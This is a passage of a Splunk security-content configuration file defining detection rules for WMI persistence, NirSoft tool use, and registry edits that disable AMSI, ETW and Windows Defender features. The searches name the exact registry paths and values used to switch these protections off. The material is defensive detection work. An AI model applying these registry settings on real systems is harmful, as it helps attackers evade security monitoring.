[{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect WMI Event Subscription Persistence - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious WMI Use"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546.003", "T1546"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the use of WMI Event Subscription to establish persistence or perform privilege escalation. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges. This analytic is restricted by commonly added process execution and a path. If the volume is low enough, remove the values and flag on any new subscriptions.\ All event subscriptions have three components \ 1. Filter - WQL Query for the events we want. EventID equals 19 \ 1. Consumer - An action to take upon triggering the filter. EventID equals 20 \ 1. Binding - Registers a filter to a consumer. EventID equals 21 \ Monitor for the creation of new WMI EventFilter, EventConsumer, and FilterToConsumerBinding. It may be pertinent to review all 3 to identify the flow of execution. In addition, EventCode 4104 may assist with any other PowerShell script usage that registered the subscription. action.notable.param.rule_title = Detect WMI Event Subscription Persistence action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventID=20 | stats count min(_time) as firstTime max(_time) as lastTime by Computer User Destination | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_wmi_event_subscription_persistence_filter` [ESCU - Detection of tools built by NirSoft - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search looks for specific command-line arguments that may indicate the execution of tools made by Nirsoft, which are legitimate, but may be abused by attackers. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1072"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search looks for specific command-line arguments that may indicate the execution of tools made by Nirsoft, which are legitimate, but may be abused by attackers. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = While legitimate, these NirSoft tools are prone to abuse. You should verfiy that the tool was used for a legitimate purpose. action.escu.creation_date = 2020-07-21 action.escu.modification_date = 2020-07-21 action.escu.confidence = high action.escu.full_search_name = ESCU - Detection of tools built by NirSoft - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Emotet Malware DHS Report TA18-201A"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Detection of tools built by NirSoft - Rule action.correlationsearch.annotations = {"analytic_story": ["Emotet Malware DHS Report TA18-201A"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1072"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search looks for specific command-line arguments that may indicate the execution of tools made by Nirsoft, which are legitimate, but may be abused by attackers. action.notable.param.rule_title = Detection of tools built by NirSoft action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) values(Processes.process) as process max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process="* /stext *" OR Processes.process="* /scomma *" ) by Processes.parent_process Processes.process_name Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` | `detection_of_tools_built_by_nirsoft_filter` [ESCU - Disable AMSI Through Registry - Rule] action.escu = 0 action.escu.enabled = 1 description = this search is to identify modification in registry to disable AMSI windows feature to evade detections. This technique was seen in several ransomware, RAT and even APT to impaire defenses of the compromise machine and to be able to execute payload with minimal alert as much as possible. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = this search is to identify modification in registry to disable AMSI windows feature to evade detections. This technique was seen in several ransomware, RAT and even APT to impaire defenses of the compromise machine and to be able to execute payload with minimal alert as much as possible. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the offical Sysmon TA. https://splunkbase.splunk.com/app/5709 action.escu.known_false_positives = network operator may disable this feature of windows but not so common. action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Disable AMSI Through Registry - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Ransomware", "CISA AA23-347A", "Windows Registry Abuse"] action.risk = 1 action.risk.param._risk_message = Disable AMSI Through Registry on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Disable AMSI Through Registry - Rule action.correlationsearch.annotations = {"analytic_story": ["Ransomware", "CISA AA23-347A", "Windows Registry Abuse"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = this search is to identify modification in registry to disable AMSI windows feature to evade detections. This technique was seen in several ransomware, RAT and even APT to impaire defenses of the compromise machine and to be able to execute payload with minimal alert as much as possible. action.notable.param.rule_title = Disable AMSI Through Registry action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows Script\\Settings\\AmsiEnable" Registry.registry_value_data = "0x00000000") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid Registry.dest Registry.user | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_amsi_through_registry_filter` [ESCU - Disable Defender AntiVirus Registry - Rule] action.escu = 0 action.escu.enabled = 1 description = This particular behavior is typically executed when an adversary or malware gains access to an endpoint and begins to perform execution and to evade detections. Usually, a batch (.bat) file will be executed and multiple registry and scheduled task modifications will occur. During triage, review parallel processes and identify any further file modifications. Endpoint should be isolated. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This particular behavior is typically executed when an adversary or malware gains access to an endpoint and begins to perform execution and to evade detections. Usually, a batch (.bat) file will be executed and multiple registry and scheduled task modifications will occur. During triage, review parallel processes and identify any further file modifications. Endpoint should be isolated. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the offical Sysmon TA. https://splunkbase.splunk.com/app/5709 action.escu.known_false_positives = admin or user may choose to disable windows defender product action.escu.creation_date = 2023-04-11 action.escu.modification_date = 2023-04-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Disable Defender AntiVirus Registry - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["IcedID", "Windows Registry Abuse"] action.risk = 1 action.risk.param._risk_message = Modified/added/deleted registry entry $registry_path$ in $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Disable Defender AntiVirus Registry - Rule action.correlationsearch.annotations = {"analytic_story": ["IcedID", "Windows Registry Abuse"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This particular behavior is typically executed when an adversary or malware gains access to an endpoint and begins to perform execution and to evade detections. Usually, a batch (.bat) file will be executed and multiple registry and scheduled task modifications will occur. During triage, review parallel processes and identify any further file modifications. Endpoint should be isolated. action.notable.param.rule_title = Disable Defender AntiVirus Registry action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path = "*\\Policies\\Microsoft\\Windows Defender*" Registry.registry_value_name IN ("DisableAntiSpyware","DisableAntiVirus") Registry.registry_value_data = 0x00000001) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid Registry.user Registry.dest | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_defender_antivirus_registry_filter` [ESCU - Disable Defender BlockAtFirstSeen Feature - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is intended to detect a suspicious modification of the Windows registry to disable a Windows Defender feature. This technique is intended to bypass or evade detection from Windows Defender AV, specifically the BlockAtFirstSeen feature where it blocks suspicious files the first time seen on the host. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is intended to detect a suspicious modification of the Windows registry to disable a Windows Defender feature. This technique is intended to bypass or evade detection from Windows Defender AV, specifically the BlockAtFirstSeen feature where it blocks suspicious files the first time seen on the host. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the offical Sysmon TA. https://splunkbase.splunk.com/app/5709 action.escu.known_false_positives = admin or user may choose to disable windows defender product action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Disable Defender BlockAtFirstSeen Feature - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Azorult", "CISA AA23-347A", "IcedID", "Windows Registry Abuse"] action.risk = 1 action.risk.param._risk_message = modified/added/deleted registry entry $registry_path$ in $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Disable Defender BlockAtFirstSeen Feature - Rule action.correlationsearch.annotations = {"analytic_story": ["Azorult", "CISA AA23-347A", "IcedID", "Windows Registry Abuse"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic is intended to detect a suspicious modification of the Windows registry to disable a Windows Defender feature. This technique is intended to bypass or evade detection from Windows Defender AV, specifically the BlockAtFirstSeen feature where it blocks suspicious files the first time seen on the host. action.notable.param.rule_title = Disable Defender BlockAtFirstSeen Feature action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path = "*\\Microsoft\\Windows Defender\\SpyNet*" Registry.registry_value_name = DisableBlockAtFirstSeen Registry.registry_value_data = 0x00000001) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid Registry.user Registry.dest | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_defender_blockatfirstseen_feature_filter` [ESCU - Disable Defender Enhanced Notification - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is intended to detect a suspicious modification of registry to disable windows defender features. This technique attempts to bypass or evade detection from Windows Defender AV, specifically the Enhanced Notification feature where a user or admin would receive alerts. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is intended to detect a suspicious modification of registry to disable windows defender features. This technique attempts to bypass or evade detection from Windows Defender AV, specifically the Enhanced Notification feature where a user or admin would receive alerts. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = user may choose to disable windows defender AV action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Disable Defender Enhanced Notification - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Azorult", "CISA AA23-347A", "IcedID", "Windows Registry Abuse"] action.risk = 1 action.risk.param._risk_message = modified/added/deleted registry entry $registry_path$ in $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Disable Defender Enhanced Notification - Rule action.correlationsearch.annotations = {"analytic_story": ["Azorult", "CISA AA23-347A", "IcedID", "Windows Registry Abuse"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic is intended to detect a suspicious modification of registry to disable windows defender features. This technique attempts to bypass or evade detection from Windows Defender AV, specifically the Enhanced Notification feature where a user or admin would receive alerts. action.notable.param.rule_title = Disable Defender Enhanced Notification action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) AS firstTime max(_time) AS lastTime FROM datamodel=Endpoint.Processes BY _time span=1h Processes.user Processes.process_id Processes.process_name Processes.process Processes.process_path Processes.dest Processes.parent_process_name Processes.parent_process Processes.process_guid | `drop_dm_object_name(Processes)` | join process_guid [ | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path = "*Microsoft\\Windows Defender\\Reporting*" Registry.registry_value_name = DisableEnhancedNotifications Registry.registry_value_data = 0x00000001) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`] | fields firstTime lastTime dest user parent_process_name parent_process process_name process_path process registry_key_name registry_path registry_value_name registry_value_data process_guid | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_defender_antivirus_registry_filter` [ESCU - Disable Defender MpEngine Registry - Rule] action.escu = 0 action.escu.enabled = 1 description = This particular behavior is typically executed when an adversary or malware gains access to an endpoint and begins to perform execution and to evade detections. Usually, a batch (.bat) file will be executed and multiple registry and scheduled task modifications will occur. During triage, review parallel processes and identify any further file modifications. Endpoint should be isolated. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This particular behavior is typically executed when an adversary or malware gains access to an endpoint and begins to perform execution and to evade detections. Usually, a batch (.bat) file will be executed and multiple registry and scheduled task modifications will occur. During triage, review parallel processes and identify any further file modifications. Endpoint should be isolated. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the offical Sysmon TA. https://splunkbase.splunk.com/app/5709 action.escu.known_false_positives = admin or user may choose to disable windows defender product action.escu.creation_date = 2023-04-11 action.escu.modification_date = 2023-04-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Disable Defender MpEngine Registry - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["IcedID", "Windows Registry Abuse"] action.risk = 1 action.risk.param._risk_message = Modified/added/deleted registry entry $registry_path$ in $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Disable Defender MpEngine Registry - Rule action.correlationsearch.annotations = {"analytic_story": ["IcedID", "Windows Registry Abuse"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This particular behavior is typically executed when an adversary or malware gains access to an endpoint and begins to perform execution and to evade detections. Usually, a batch (.bat) file will be executed and multiple registry and scheduled task modifications will occur. During triage, review parallel processes and identify any further file modifications. Endpoint should be isolated. action.notable.param.rule_title = Disable Defender MpEngine Registry action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path = "*\\Policies\\Microsoft\\Windows Defender\\MpEngine*" Registry.registry_value_name = MpEnablePus Registry.registry_value_data = 0x00000000) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid Registry.user Registry.dest | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_defender_mpengine_registry_filter` [ESCU - Disable Defender Spynet Reporting - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is intended to detect a suspicious modification of registry to disable Windows Defender feature. This technique is intended to bypass or evade detection from Windows Defender AV product, specifically the spynet reporting for Defender telemetry. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is intended to detect a suspicious modification of registry to disable Windows Defender feature. This technique is intended to bypass or evade detection from Windows Defender AV product, specifically the spynet reporting for Defender telemetry. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the offical Sysmon TA. https://splunkbase.splunk.com/app/5709 action.escu.known_false_positives = admin or user may choose to disable windows defender product action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Disable Defender Spynet Reporting - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Azorult", "Windows Registry Abuse", "Qakbot", "IcedID", "CISA AA23-347A"] action.risk = 1 action.risk.param._risk_message = modified/added/deleted registry entry $registry_path$ in $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Disable Defender Spynet Reporting - Rule action.correlationsearch.annotations = {"analytic_story": ["Azorult", "Windows Registry Abuse", "Qakbot", "IcedID", "CISA AA23-347A"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic is intended to detect a suspicious modification of registry to disable Windows Defender feature. This technique is intended to bypass or evade detection from Windows Defender AV product, specifically the spynet reporting for Defender telemetry. action.notable.param.rule_title = Disable Defender Spynet Reporting action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path = "*\\Microsoft\\Windows Defender\\SpyNet*" Registry.registry_value_name = SpynetReporting Registry.registry_value_data = 0x00000000) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid Registry.user Registry.dest | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_defender_spynet_reporting_filter` [ESCU - Disable Defender Submit Samples Consent Feature - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is intended to detect a suspicious modification of the Windows registry to disable a Windows Defender feature. This technique is intended to bypass or evade detection from Windows Defender AV, specifically the feature that submits samples for further analysis. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is intended to detect a suspicious modification of the Windows registry to disable a Windows Defender feature. This technique is intended to bypass or evade detection from Windows Defender AV, specifically the feature that submits samples for further analysis. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the offical Sysmon TA. https://splunkbase.splunk.com/app/5709 action.escu.known_false_positives = admin or user may choose to disable windows defender product action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Disable Defender Submit Samples Consent Feature - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Azorult", "CISA AA23-347A", "IcedID", "Windows Registry Abuse"] action.risk = 1 action.risk.param._risk_message = modified/added/deleted registry entry $registry_path$ in $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Disable Defender Submit Samples Consent Feature - Rule action.correlationsearch.annotations = {"analytic_story": ["Azorult", "CISA AA23-347A", "IcedID", "Windows Registry Abuse"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic is intended to detect a suspicious modification of the Windows registry to disable a Windows Defender feature. This technique is intended to bypass or evade detection from Windows Defender AV, specifically the feature that submits samples for further analysis. action.notable.param.rule_title = Disable Defender Submit Samples Consent Feature action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path = "*\\Microsoft\\Windows Defender\\SpyNet*" Registry.registry_value_name = SubmitSamplesConsent Registry.registry_value_data = 0x00000000) BY _time span=1h Registry.user Registry.dest Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `disable_defender_submit_samples_consent_feature_filter` [ESCU - Disable ETW Through Registry - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to identify modification in registry to disable ETW windows feature to evade detections. This technique was seen in several ransomware, RAT and even APT to impaire defenses of the compromise machine and to be able to execute payload with minimal alert as much as possible. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.001", "T1562"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search is to identify modification in registry to disable ETW windows feature to evade detections. This technique was seen in several ransomware, RAT and even APT to impaire defenses of the compromise machine and to be able to execute payload with minimal alert as much as possible. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the registry value name, registry path, and registry value data from your endpoints. If you are using Sysmon, you must have at least version 2.0 of the offical Sysmon TA. https://splunkbase.splunk.com/app/5709 action.escu.known_false_positives = network operator may disable this feature of windows but not so common. action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Disable ETW Through Registry - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Ransomware", "CISA AA23-347A", "Windows Registry Abuse"] action.risk = 1 action.risk.param._risk_message = Disable ETW Through Registry on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 